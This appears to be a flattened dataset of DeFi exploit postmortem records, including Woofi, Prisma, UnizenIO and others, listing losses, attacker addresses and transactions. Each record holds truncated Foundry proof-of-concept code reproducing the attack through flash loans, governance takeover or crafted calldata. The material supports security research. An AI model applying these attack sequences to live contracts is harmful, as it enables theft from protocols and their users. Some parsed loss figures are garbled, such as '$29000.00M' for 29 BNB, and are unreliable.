https://twitter.com/Phalcon_xyz/status/1662744426475831298
$7.50M
7.68
medium
BabyDogeCoin Exploit (2023-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~111K USD$ // Attacker : https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 // Attack Contract : https://etherscan.io/address/0x7c28e0977f72c5d08d5e...
exploit_poc
ERC20TokenBank
2023-05
ERC20TokenBank_exp.sol
null
abbe2134cca4f66d
2026-01-07T10:59:16.522851
postmortems
ethereum
17,376,906
~111K USD$
111,000
https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671
https://etherscan.io/address/0x7c28e0977f72c5d08d5e1ac7d52a34db378282b3
https://etherscan.io/address/0x765b8d7cd8ff304f796f4b6fb1bcf78698333f6d
https://etherscan.io/tx/0x578a195e05f04b19fd8af6358dc6407aa1add87c3167f053beb990d6b4735f26
null
https://twitter.com/BlockSecTeam/status/1663810037788311561
true
true
false
high
~111K USD$
unknown
false
~111K USD$
https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671
https://etherscan.io/address/0x7c28e0977f72c5d08d5e1ac7d52a34db378282b3
https://etherscan.io/address/0x765b8d7cd8ff304f796f4b6fb1bcf78698333f6d
https://etherscan.io/tx/0x578a195e05f04b19fd8af6358dc6407aa1add87c3167f053beb990d6b4735f26
https://twitter.com/BlockSecTeam/status/1663810037788311561
$111.0K
5.29
medium
ERC20TokenBank Exploit (2023-05)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D); ...
exploit_poc
BuildF
2022-02
BuildF_exp.sol
null
3a0e357ab6c8eb3b
2026-01-07T10:59:16.522897
postmortems
unknown
14,235,712
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function test() public { cheat.prank(0x562680a4dC50ed2f14d75BF31f494cfE0b8D10a1); build.transfer(address(this), 101_529_401_443_281_484_977); emit log_named_uint("Befre proposing, BUILD balance of attacker:", build.balanceOf(address(this))); build.approve(address(BuildGovernance), type(u...
true
Unknown
3.24
low
BuildF Exploit (2022-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; interface SushiRouter { function swapExactTokensForTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ...
exploit_poc
Meter
2022-02
Meter_exp.sol
null
1fa45f12f9bb35c6
2026-01-07T10:59:16.522940
postmortems
unknown
1,442,490
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheats.startPrank(attacker); address[] memory path = new address[](2); path[0] = 0x8d3d13cac607B7297Ff61A5E1E71072758AF4D01; path[1] = 0x639A647fbe20b6c8ac19E48E2de44ea792c62c5C; // sushiSwapRouter.call(hex"38ed173900000000000000000000000000000000...
true
Unknown
3.08
low
Meter Exploit (2022-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* @KeyInfo - Total Lost: 639,222 $USDT - Attacker: https://etherscan.io/address/0xb19b7f59c08ea447f82b587c058ecbf5fde9c299 - Attack Contract: https://etherscan.io/address/0x6653d9...
exploit_poc
TecraSpace
2022-02
TecraSpace_exp.sol
null
fd8bccd1b1173d92
2026-01-07T10:59:16.522986
postmortems
ethereum
14,139,082
639,222 $USDT
639
https://etherscan.io/address/0xb19b7f59c08ea447f82b587c058ecbf5fde9c299
https://etherscan.io/address/0x6653d9bcbc28fc5a2f5fb5650af8f2b2e1695a15
null
https://app.blocksec.com/explorer/tx/eth/0x81e9918e248d14d78ff7b697355fd9f456c6d7881486ed14fdfb69db16631154
null
null
true
false
false
low
639,222 $USDT
unknown
false
639,222 $USDT
https://etherscan.io/address/0xb19b7f59c08ea447f82b587c058ecbf5fde9c299
https://etherscan.io/address/0x6653d9bcbc28fc5a2f5fb5650af8f2b2e1695a15
https://app.blocksec.com/explorer/tx/eth/0x81e9918e248d14d78ff7b697355fd9f456c6d7881486ed14fdfb69db16631154
$639
4.73
low
TecraSpace Exploit (2022-02)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; contract ContractTest is Test { ILand Land = ILand(0x50f5474724e0Ee42D9a4e711ccFB275809Fd6d4a); address ...
exploit_poc
Sandbox
2022-02
Sandbox_exp.sol
null
c8ab3a6d741f2de8
2026-01-07T10:59:16.523031
postmortems
unknown
14,163,041
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { cheats.startPrank(0x6FB0B915D0e10c3B2ae42a5DD879c3D995377A2C); console.log("Before exploiting, victim owned NFT:", Land._numNFTPerAddress(victim)); // 2762 is the number of NFTs in the victim's account. for (uint256 i = 0; i < 100; i++) { // let's try ...
true
Unknown
2.59
low
Sandbox Exploit (2022-02)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/optimism/0x4ec3061724ca9f0b8d400866dd83b92647ad8c943a1c0ae9ae6c9bd1ef789417 // Profit : ~413K USD,but i get more // REASON : Bussiness Logic Flaw in...
exploit_poc
MO
2024-03
MO_exp.sol
null
af754af64b637759
2026-01-07T10:59:16.523075
postmortems
unknown
117,395,511
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.7
low
MO Exploit (2024-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Attacker : https://bscscan.com/address/0xff61Ba33Ed51322BB716EAb4137Adf985644b94d // Attack Contract : https://bscscan.com/address/0x0edf13f6bd033f0f267d46c6e9dff9c7190e0fa0 // Attack Tx : http...
exploit_poc
ALP
2024-03
ALP_exp.sol
null
51844aaf72e73151
2026-01-07T10:59:16.523128
postmortems
bsc
36,727,073
null
null
https://bscscan.com/address/0xff61Ba33Ed51322BB716EAb4137Adf985644b94d
https://bscscan.com/address/0x0edf13f6bd033f0f267d46c6e9dff9c7190e0fa0
null
https://app.blocksec.com/explorer/tx/bsc/0x9983ca8eaee9ee69629f74537eaf031272af75f1e5a7725911d8b06df17c67ca
null
null
false
false
false
medium
null
unknown
false
https://bscscan.com/address/0xff61Ba33Ed51322BB716EAb4137Adf985644b94d
https://bscscan.com/address/0x0edf13f6bd033f0f267d46c6e9dff9c7190e0fa0
https://app.blocksec.com/explorer/tx/bsc/0x9983ca8eaee9ee69629f74537eaf031272af75f1e5a7725911d8b06df17c67ca
Unknown
3.48
low
ALP Exploit (2024-03)
false
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~54 ETH // Attacker : https://etherscan.io/address/0x3fA19214705BC82cE4b898205157472A79D026BE // Attack Contract : https://etherscan.io/address/0xa8b45dEE8306b520465f1f8...
exploit_poc
Juice
2024-03
Juice_exp.sol
null
e8f3ac6f4e4c71af
2026-01-07T10:59:16.523177
postmortems
ethereum
null
~54 ETH
54
https://etherscan.io/address/0x3fA19214705BC82cE4b898205157472A79D026BE
https://etherscan.io/address/0xa8b45dEE8306b520465f1f8da7E11CD8cFD1bBc4
https://etherscan.io/address/0x8584ddbd1e28bca4bc6fb96bafe39f850301940e
https://etherscan.io/tx/0xc9b2cbc1437bbcd8c328b6d7cdbdae33d7d2a9ef07eca18b4922aac0430991e7
null
null
true
false
false
low
~54 ETH
unknown
function testExploit() public { emit log_named_decimal_uint("[Start] Attacker ETH balance before exploit", address(this).balance, 18); //stake 0.5 ETH ETHtoJUICE(0.5 ether); JUICE.approve(address(JuiceStaking), type(uint256).max); JuiceStaking.stake(JUICE.balanceOf(address(this)...
true
~54 ETH
https://etherscan.io/address/0x3fA19214705BC82cE4b898205157472A79D026BE
https://etherscan.io/address/0xa8b45dEE8306b520465f1f8da7E11CD8cFD1bBc4
https://etherscan.io/address/0x8584ddbd1e28bca4bc6fb96bafe39f850301940e
https://etherscan.io/tx/0xc9b2cbc1437bbcd8c328b6d7cdbdae33d7d2a9ef07eca18b4922aac0430991e7
$54
7.35
medium
Juice Exploit (2024-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$223K // Attacker : https://bscscan.com/address/0x2c42824ef89d6efa7847d3997266b62599560a26 // Attack Contract : https://bscscan.com/address/0x0bd0d9ba4f52db225b265c3cff...
exploit_poc
ZongZi
2024-03
ZongZi_exp.sol
null
b7cb0879ce04dffb
2026-01-07T10:59:16.523229
postmortems
bsc
null
~$223K
223,000
https://bscscan.com/address/0x2c42824ef89d6efa7847d3997266b62599560a26
https://bscscan.com/address/0x0bd0d9ba4f52db225b265c3cffa7bc4a418d22a9
null
null
null
null
true
true
false
high
~$223K
unknown
function testExploit() public { emit log_named_decimal_uint("Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), 18); uint256 pairWBNBBalance = WBNB.balanceOf(address(WBNB_ZONGZI)); uint256 multiplier = uint256(vm.load(attackContract, bytes32(uint256(9)))); uint256 am...
true
~$223K
https://bscscan.com/address/0x2c42824ef89d6efa7847d3997266b62599560a26
https://bscscan.com/address/0x0bd0d9ba4f52db225b265c3cffa7bc4a418d22a9
$223.0K
6.43
medium
ZongZi Exploit (2024-03)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$1.24K (2.13 BNB) // Attacker : https://bscscan.com/address/0x52e38d496f8d712394d5ed55e4d4cdd21f1957de // Attack Contract : https://bscscan.co...
exploit_poc
ETHFIN
2024-03
ETHFIN_exp.sol
null
4320ab2191c130da
2026-01-07T10:59:16.523290
postmortems
bsc
37,400,485
~$1.24K (2.13 BNB)
1,240
https://bscscan.com/address/0x52e38d496f8d712394d5ed55e4d4cdd21f1957de
https://bscscan.com/address/0x11bfd986299bb0d5666536e361f312198e882642
https://bscscan.com/address/0x17bd2e09fa4585c15749f40bb32a6e3db58522ba
https://bscscan.com/tx/0xfe031685d84f3bae1785f5b2bd0ed480b87815c3f23ce6ced73b8573b7e367c6
null
null
true
true
false
low
~$1.24K (2.13 BNB)
unknown
false
~$1.24K (2.13 BNB)
https://bscscan.com/address/0x52e38d496f8d712394d5ed55e4d4cdd21f1957de
https://bscscan.com/address/0x11bfd986299bb0d5666536e361f312198e882642
https://bscscan.com/address/0x17bd2e09fa4585c15749f40bb32a6e3db58522ba
https://bscscan.com/tx/0xfe031685d84f3bae1785f5b2bd0ed480b87815c3f23ce6ced73b8573b7e367c6
$1.2K
6.49
medium
ETHFIN Exploit (2024-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : 5.06 ETH // TX : https://app.blocksec.com/explorer/tx/eth/0x4019890fe5a5bd527cd3b9f7ee6d94e55b331709b703317860d028745e33a8ca?line=4 // Attacker : https://etherscan.io/a...
exploit_poc
BBT
2024-03
BBT_exp.sol
null
f01db2ce9c09f042
2026-01-07T10:59:16.523353
postmortems
ethereum
19,417,822
5.06 ETH
5.06
https://etherscan.io/address/0xc9a5643ed8e4cd68d16fe779d378c0e8e7225a54
https://etherscan.io/address/0xf5610cf8c27454b6d7c86fccf1830734501425c5
null
null
null
null
true
false
false
low
5.06 ETH
unknown
function attack() public { create_contract(0); }
true
https://etherscan.io/address/0xc9a5643ed8e4cd68d16fe779d378c0e8e7225a54
https://etherscan.io/address/0xf5610cf8c27454b6d7c86fccf1830734501425c5
$5
6.51
medium
BBT Exploit (2024-03)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$150K // Attacker : https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1 // Attack Contract : https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1...
exploit_poc
TGBS
2024-03
TGBS_exp.sol
flash_loan
7eb8887abeb4e50c
2026-01-07T10:59:16.523401
postmortems
bsc
36,725,819
~$150K
150,000
https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1
https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1707f9497b51cd9
null
https://app.blocksec.com/explorer/tx/bsc/0xa0408770d158af99a10c60474d6433f4c20f3052e54423f4e590321341d4f2a4
null
null
true
true
true
high
~$150K
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Exploiter WBNB balance before attack", WBNB.balanceOf(address(this)), WBNB.decimals() ); uint256 baseAmount = WBNB.balanceOf(address(DPPOracle)); DPPOracle.flashLoan(baseAmount, 0, address(this), abi.encodePacked(...
true
~$150K
https://bscscan.com/address/0xff1db040e4f2a44305e28f8de728dabff58f01e1
https://bscscan.com/address/0x1a8eb8eca01819b695637c55c1707f9497b51cd9
https://app.blocksec.com/explorer/tx/bsc/0xa0408770d158af99a10c60474d6433f4c20f3052e54423f4e590321341d4f2a4
$150.0K
7.63
medium
TGBS Exploit (2024-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xe8b0131fa14d0a96327f6b5690159ffa7650d66376db87366ba78d91f17cd677 // GUY : https://twitter.com/Phalcon_xyz/status/1771728823534375249 // Profit : ...
exploit_poc
ARK
2024-03
ARK_exp.sol
null
660e05babc2a2627
2026-01-07T10:59:16.523447
postmortems
unknown
37,221,235
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.06
low
ARK Exploit (2024-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; // @KeyInfo - Total Lost : ~0.2 $BNB // Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 // Attack Contract : https://bscscan.com/address/0x132e1ea5db918dae00eef685b845c409a83dfa82 // Vulnerable Contract : https://bscscan....
exploit_poc
Binemon
2024-03
Binemon_exp.sol
null
67854cb456bf40e3
2026-01-07T10:59:16.523492
postmortems
bsc
36,864,395
~0.2 $BNB
0.2
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x132e1ea5db918dae00eef685b845c409a83dfa82
https://bscscan.com/address/0xe56842ed550ff2794f010738554db45e60730371
https://app.blocksec.com/explorer/tx/bsc/0x1999bb5c11a8d8bfa7620fc5cc37f5bc59c1a99d7a9250a8d6076c93bbdbeb5f
null
null
true
false
false
low
~0.2 $BNB
unknown
function testExploit() public { WBNB.approve(address(Router), type(uint256).max); BIN.approve(address(Router), type(uint256).max); deal(address(WBNB), address(this), 1 ether); deal(address(WBNB), address(otherUser), 10 ether); emit log_named_decimal_uint("Attacker WBNB balance be...
true
~0.2 $BNB
https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
https://bscscan.com/address/0x132e1ea5db918dae00eef685b845c409a83dfa82
https://bscscan.com/address/0xe56842ed550ff2794f010738554db45e60730371
https://app.blocksec.com/explorer/tx/bsc/0x1999bb5c11a8d8bfa7620fc5cc37f5bc59c1a99d7a9250a8d6076c93bbdbeb5f
$0
7.53
medium
Binemon Exploit (2024-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~8M // Attacker : https://arbiscan.io/address/0x9961190b258897bca7a12b8f37f415e689d281c4 // Attack Contract : https://arbiscan.io/address/0xc3910dca5d3931f4a10261b8f58e1...
exploit_poc
Woofi
2024-03
Woofi_exp.sol
flash_loan
9ee9e42b4ff2ae3a
2026-01-07T10:59:16.523536
postmortems
arbitrum
187,381,784
~8M
8,000,000
https://arbiscan.io/address/0x9961190b258897bca7a12b8f37f415e689d281c4
https://arbiscan.io/address/0xc3910dca5d3931f4a10261b8f58e1a19a13e0203
https://arbiscan.io/address/0xeff23b4be1091b53205e35f3afcd9c7182bf3062
https://arbiscan.io/tx/0x57e555328b7def90e1fc2a0f7aa6df8d601a8f15803800a5aaf0a20382f21fbd
null
null
true
true
true
critical
~8M
flash-loan
function testExploit() public { WOO.approve(WooPPV2, type(uint256).max); WOO.approve(Silo, type(uint256).max); USDCe.approve(WooPPV2, type(uint256).max); USDCe.approve(Silo, type(uint256).max); uni_flash_amount = USDCe.balanceOf(Univ3pool) - 10_000_000_000; IUniswapV3Fla...
true
~8M
https://arbiscan.io/address/0x9961190b258897bca7a12b8f37f415e689d281c4
https://arbiscan.io/address/0xc3910dca5d3931f4a10261b8f58e1a19a13e0203
https://arbiscan.io/address/0xeff23b4be1091b53205e35f3afcd9c7182bf3062
https://arbiscan.io/tx/0x57e555328b7def90e1fc2a0f7aa6df8d601a8f15803800a5aaf0a20382f21fbd
$8.00M
10
high
Woofi Exploit (2024-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.19; import {Test, console2} from "forge-std/Test.sol"; // @KeyInfo - Total Lost: ~$11M // Attacker: 0x7e39e3b3ff7adef2613d5cc49558eab74b9a4202 // Attack Contract: 0xd996073019c74b2fb94ead236e32032405bc027c // Vulnerable Contract: 0xcc7218100da61441905e0c3277...
exploit_poc
Prisma
2024-03
Prisma_exp.sol
flash_loan
b538ed29b4db99c5
2026-01-07T10:59:16.523599
postmortems
ethereum
null
~$11M
11,000,000
null
null
null
https://etherscan.io/tx/0x00c503b595946bccaea3d58025b5f9b3726177bbdc9674e634244135282116c7
null
null
true
false
true
critical
~$11M
flash-loan
function test_exploit() public { uint256 price = priceFeed.fetchPrice(wstETH); console2.log("Price Feed Price: ", price); // start with ~1800 mkUSD deal(address(mkUSD), address(this), 1_800_000_022_022_732_637); console2.log("Attacker start with ~1800 mkUSD: ", IERC20(mkUSD).ba...
true
~$11M
https://etherscan.io/tx/0x00c503b595946bccaea3d58025b5f9b3726177bbdc9674e634244135282116c7
$11.00M
9
high
Prisma Exploit (2024-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~998B(cgt token) // TX : https://app.blocksec.com/explorer/tx/eth/0x4ff4028b03c3df468197358b99f5160e5709e7fce3884cc8ce818856d058e106 // Attacker : https://etherscan.io/...
exploit_poc
CGT
2024-03
CGT_exp.sol
null
bb92817f75ddfcf5
2026-01-07T10:59:16.523688
postmortems
ethereum
19,498,910
~998B(cgt token)
998,000,000,000
https://etherscan.io/address/0xdaaa6294c47b5743bdafe0613d1926ee27ae8cf5
https://etherscan.io/address/0x1e791527aea32cddbd7ceb7f04612db536816545
null
null
null
null
true
false
false
critical
~998B(cgt token)
unknown
function attack() public { cgt.approve(address(chief), type(uint256).max); chief.lock(20 ether); address[] memory yays = new address[](1); yays[0] = address(this); chief.vote(yays); chief.lift(address(this)); spell = new Spell(); address spelladdr = addres...
true
https://etherscan.io/address/0xdaaa6294c47b5743bdafe0613d1926ee27ae8cf5
https://etherscan.io/address/0x1e791527aea32cddbd7ceb7f04612db536816545
$998000.00M
7
medium
CGT Exploit (2024-03)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~340K // Attacker : https://arbiscan.io/address/0x851aa754c39bf23cdaac2025367514dfd7530418 // Attack Contract 1: https://arbiscan.io/address/0x3e52c217a902002ca296fe6769...
exploit_poc
LavaLending
2024-03
LavaLending_exp.sol
flash_loan
74607b27e3c86e3d
2026-01-07T10:59:16.523765
postmortems
arbitrum
195,240,642
~340K
340,000
https://arbiscan.io/address/0x851aa754c39bf23cdaac2025367514dfd7530418
null
https://arbiscan.io/address/0x7746872c6892bcfb4254390283719f2bd2d4da76#code
https://app.blocksec.com/explorer/tx/arbitrum/0xcb1a2f5eeb1a767ea5ccbc3665351fadc1af135d12a38c504f8f6eb997e9e603
null
null
true
true
true
high
~340K
flash-loan
function testExploit() public { emit log_named_decimal_uint( "Exploiter USDCe balance before attack", USDCe.balanceOf(address(this)), USDCe.decimals() ); emit log_named_decimal_uint( "Exploiter wstEth balance before attack", wstETH.balanceOf(address(this)), wstETH.decima...
true
~340K
https://arbiscan.io/address/0x851aa754c39bf23cdaac2025367514dfd7530418
https://arbiscan.io/address/0x7746872c6892bcfb4254390283719f2bd2d4da76#code
https://app.blocksec.com/explorer/tx/arbitrum/0xcb1a2f5eeb1a767ea5ccbc3665351fadc1af135d12a38c504f8f6eb997e9e603
$340.0K
10
high
LavaLending Exploit (2024-03)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~2M USD$ // Attacker : https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df // Vulnerable Contract : (Unizen: Trade Aggregator Proxy) https://etherscan...
exploit_poc
UnizenIO
2024-03
UnizenIO_exp.sol
null
03c8e5d56ce74589
2026-01-07T10:59:16.523861
postmortems
ethereum
19,393,769
~2M USD$
2,000,000
https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df
null
null
https://app.blocksec.com/explorer/tx/eth/0x923d1d63a1165ebd3521516f6d22d015f2e1b4b22d5dc954152b6c089c765fcd
null
null
true
true
false
critical
~2M USD$
unknown
function testExploit() public { vm.startPrank(attacker); aggregator_proxy.call{value: 1}( hex"1ef29a02000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a00000000000000000000000002ad8aed847e8d4d3da52aabb7d0f5c25729d10...
true
~2M USD$
https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df
https://app.blocksec.com/explorer/tx/eth/0x923d1d63a1165ebd3521516f6d22d015f2e1b4b22d5dc954152b6c089c765fcd
$2.00M
6.66
medium
UnizenIO Exploit (2024-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "../basetest.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost: $4.8M // Attacker: 0x6a89a8C67B5066D59BF4D81d59f70C3976faCd0A // Attack Contract: 0xDed85d83Bf06069c0bD5AA792234b5015D5410A9 // Vulnerable Contract: 0xdfDCdbC789b56F99B0d0692...
exploit_poc
SSS
2024-03
SSS_exp.sol
flash_loan
10d28233711e207a
2026-01-07T10:59:16.523903
postmortems
unknown
1,110,245
$4.8M
4,800,000
null
null
null
https://blastscan.io/tx/0x62e6b906bb5aafdc57c72cd13e20a18d2de3a4a757cd2f24fde6003ce5c9f2c6
null
null
true
false
true
critical
$4.8M
flash-loan
function testExploit() public balanceLog { //Emulate flashloan here with deal vm.deal(address(this), 0); vm.deal(address(this), ethFlashAmt); WETH.deposit{value: ethFlashAmt}(); //Buy 1 eth of tokens ROUTER_V2.swapExactTokensForTokensSupportingFeeOnTransferTokens( ...
true
$4.8M
https://blastscan.io/tx/0x62e6b906bb5aafdc57c72cd13e20a18d2de3a4a757cd2f24fde6003ce5c9f2c6
$4.80M
7.83
medium
SSS Exploit (2024-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$24K // Whitehat : https://etherscan.io/address/0xfde0d1575ed8e06fbf36256bcdfa1f359281455a // Whitehat Contract : https://etherscan.io/address/0x6980a47bee930a4584b09ee...
exploit_poc
Paraswap
2024-03
Paraswap_exp.sol
null
0f5dbc7ff3383838
2026-01-07T10:59:16.523956
postmortems
ethereum
19,470,560
~$24K
24,000
null
null
null
null
null
null
true
true
false
medium
~$24K
unknown
function testExploit() public { emit log_named_decimal_uint( "Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals() ); emit log_named_decimal_uint("Victim OPSEC balance before attack", OPSEC.balanceOf(from), OPSEC.decimals()); emit log_named_...
true
~$24K
$24.0K
5.66
medium
Paraswap Exploit (2024-03)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$57K // Attacker : https://etherscan.io/address/0x096f0f03e4be68d7e6dd39b22a3846b8ce9849a3 // Attack Contract : https://etherscan.io/address/0xcc5159b5538268f45afda7b57...
exploit_poc
GHT
2024-03
GHT_exp.sol
null
75358c2c10043808
2026-01-07T10:59:16.524004
postmortems
ethereum
null
~$57K
57,000
https://etherscan.io/address/0x096f0f03e4be68d7e6dd39b22a3846b8ce9849a3
https://etherscan.io/address/0xcc5159b5538268f45afda7b5756fa8769ce3e21f
null
https://app.blocksec.com/explorer/tx/eth/0xd17266bcdf30cbcbd7d0b5a006f43141981aeee2e1f860f68c9a1805ecacbc68?line=3
null
null
true
false
false
medium
~$57K
unknown
function testExploit() public { emit log_named_decimal_uint( "Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals() ); uint256 amount = GHT.balanceOf(address(WETH_GHT)); GHT.transferFrom(address(WETH_GHT), address(GHT), amount - 1); WET...
true
~$57K
https://etherscan.io/address/0x096f0f03e4be68d7e6dd39b22a3846b8ce9849a3
https://etherscan.io/address/0xcc5159b5538268f45afda7b5756fa8769ce3e21f
https://app.blocksec.com/explorer/tx/eth/0xd17266bcdf30cbcbd7d0b5a006f43141981aeee2e1f860f68c9a1805ecacbc68?line=3
$57.0K
6.39
medium
GHT Exploit (2024-03)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$2M // Attacker : https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df // Vuln Contract : https://etherscan.io/address/0xd3f64baa732061f8b3626ee44bab...
exploit_poc
UnizenIO2
2024-03
UnizenIO2_exp.sol
null
cfc5d8fcd9dcd341
2026-01-07T10:59:16.524052
postmortems
ethereum
19,393,360
~$2M
2,000,000
https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df
null
null
null
null
null
true
true
false
critical
~$2M
unknown
function testExploit() public { emit log_named_decimal_uint("Exploiter VRA balance before attack", VRA.balanceOf(address(this)), VRA.decimals()); ITradeAggregator.Info memory info = ITradeAggregator.Info({ to: address(this), structMember2: 0, token: address(VRA), ...
true
~$2M
https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df
$2.00M
5.63
medium
UnizenIO2 Exploit (2024-03)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0xb33057f57ce451aa8cbb65508d298fe3c627509cc64a394736dace2671b6dcfa // Profit : ~13K USD // REASON : Business Logic Flaw // Transfer from pool,wil...
exploit_poc
IT
2024-03
IT_exp.sol
null
325940c1e57bcf77
2026-01-07T10:59:16.524108
postmortems
unknown
36,934,258
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
2.72
low
IT Exploit (2024-03)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$29BNB // Attacker : https://bscscan.com/address/0x27e981348c2d1f5b2227c182a9d0ed46eed84946 // Attack Contract : https://bscscan.com/address/0x20dcf125f0563417d257b98a1...
exploit_poc
EAC
2023-08
EAC_exp.sol
flash_loan
b3f177ea72d9c0ab
2026-01-07T10:59:16.524161
postmortems
bsc
31,273,019
~$29BNB
29,000,000,000
https://bscscan.com/address/0x27e981348c2d1f5b2227c182a9d0ed46eed84946
https://bscscan.com/address/0x20dcf125f0563417d257b98a116c3fea4f0b2db2
null
https://bscscan.com/tx/0x477f9ee698ac8ae800ffa012ab52fd8de39b58996245c5e39a4233c1ae5f1baa
null
https://twitter.com/bbbb/status/1696520866564350157
true
true
true
critical
~$29BNB
flash-loan
function testExploit() public { IDPPOracle(dodo_pool).flashLoan(0, 300_000_000_000_000_008_388_608, address(this), new bytes(1)); }
true
~$29BNB
https://bscscan.com/address/0x27e981348c2d1f5b2227c182a9d0ed46eed84946
https://bscscan.com/address/0x20dcf125f0563417d257b98a116c3fea4f0b2db2
https://bscscan.com/tx/0x477f9ee698ac8ae800ffa012ab52fd8de39b58996245c5e39a4233c1ae5f1baa
https://twitter.com/bbbb/status/1696520866564350157
$29000.00M
7.19
medium
EAC Exploit (2023-08)
true
false
true
false
